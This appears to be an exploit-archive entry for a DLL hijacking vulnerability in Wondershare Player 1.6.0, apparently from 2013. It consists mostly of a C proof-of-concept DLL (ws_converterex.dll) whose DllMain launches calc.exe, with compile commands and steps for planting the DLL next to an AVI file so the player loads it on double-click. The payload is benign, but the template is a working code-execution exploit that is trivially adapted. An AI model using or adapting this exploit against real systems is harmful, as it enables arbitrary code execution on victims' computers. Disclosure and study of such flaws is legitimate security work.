Wondershare Player version 1.6.0 suffers from a DLL hijacking vulnerability.
3498e1804f5f026025c6c02ef2ff272d74d84bb446f6b691be47e4ae35dcc0c9
/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability
// # Date: 27.11.2013
// # Exploit Author: Akin Tosunlar
// # Software Link: http://download.wondershare.com/player_full1374.exe
// # Version: 1.6.0 (Probably old version of software and the LATEST version too)
// # Vendor Homepage: http://www.wondershare.com
// # Tested on: [ Windows XP sp3]
// # Contact : info@vigasis.com
// #------------------
// # Web Page : http://www.vigasis.com
// #
// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA
// #
// # gcc -shared -o ws_converterex.dll evil.c
// # Compile evil.c and rar or zip avi file and ws_converterex.dll same folder. Associate Default Player as Wondershare Player or OpenWith Wondershare Player.Double-click AVI File. program start Calc.exe immediately.
// #
*/
#include <windows.h>
int evilcode()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
evilcode();
return 0;
}